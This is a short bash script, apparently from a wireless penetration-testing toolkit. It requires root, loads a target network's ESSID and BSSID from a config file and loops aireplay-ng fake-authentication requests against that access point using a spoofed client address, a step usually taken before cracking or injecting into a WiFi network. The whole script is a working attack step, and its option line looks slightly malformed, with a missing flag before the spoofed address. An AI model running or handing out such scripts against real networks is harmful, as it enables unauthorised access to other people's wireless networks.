#!/bin/bash

if [ "$(id -u)" != "0" ]; then
	echo "This script must be run as root" 1>&2
	exit 1
fi

if [ -f ../cfg/target.conf ]; then
	. ../cfg/target.conf
else
	echo "Error: No target set!"
	exit 1
fi

. ../cfg/hardware.conf

echo "Looping auth requests..."
aireplay-ng -1 600 -o 1 -q 10 -e $ESSID -a $BSSID - $FAKE_HOST $WLAN

# Can try removing -1 6000 if it fails
